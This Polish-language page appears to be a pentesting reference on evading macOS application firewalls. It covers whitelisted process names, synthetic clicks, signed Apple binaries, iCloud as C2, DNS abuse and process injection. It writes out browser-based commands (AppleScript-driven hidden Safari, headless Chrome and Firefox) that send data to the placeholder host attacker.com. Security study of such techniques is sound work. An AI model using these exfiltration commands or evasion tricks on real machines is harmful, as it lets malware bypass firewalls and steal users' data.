Znalezione techniki

Poniższe techniki zostały znalezione działające w niektórych aplikacjach zapór sieciowych macOS.

Nadużywanie nazw na białej liście

• Na przykład nazywanie złośliwego oprogramowania nazwami znanych procesów macOS, takich jak launchd

Syntetyczne kliknięcie

• Jeśli zapora prosi użytkownika o zgodę, złośliwe oprogramowanie może kliknąć na zezwolenie

Używanie podpisanych binariów Apple

• Takich jak curl, ale także innych, takich jak whois

Znane domeny Apple

Zapora może zezwalać na połączenia z znanymi domenami Apple, takimi jak apple.com lub icloud.com. I iCloud może być używany jako C2.

Ogólne Bypassowanie

Kilka pomysłów na próbę obejścia zapór sieciowych

Sprawdź dozwolony ruch

Znajomość dozwolonego ruchu pomoże Ci zidentyfikować potencjalnie domeny na białej liście lub aplikacje, które mają do nich dostęp

lsof -i TCP -sTCP:ESTABLISHED

Nadużywanie DNS

Rozdzielanie DNS odbywa się za pomocą podpisanego aplikacji mdnsreponder, która prawdopodobnie będzie mogła nawiązać kontakt z serwerami DNS.

Za pomocą aplikacji przeglądarki

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Poprzez wstrzykiwanie procesów

Jeśli możesz wstrzyknąć kod do procesu, który ma zezwolenie na połączenie z dowolnym serwerem, możesz ominąć zabezpieczenia zapory ogniowej:

Referencje

• https://www.youtube.com/watch?v=UlT5KFTMn2k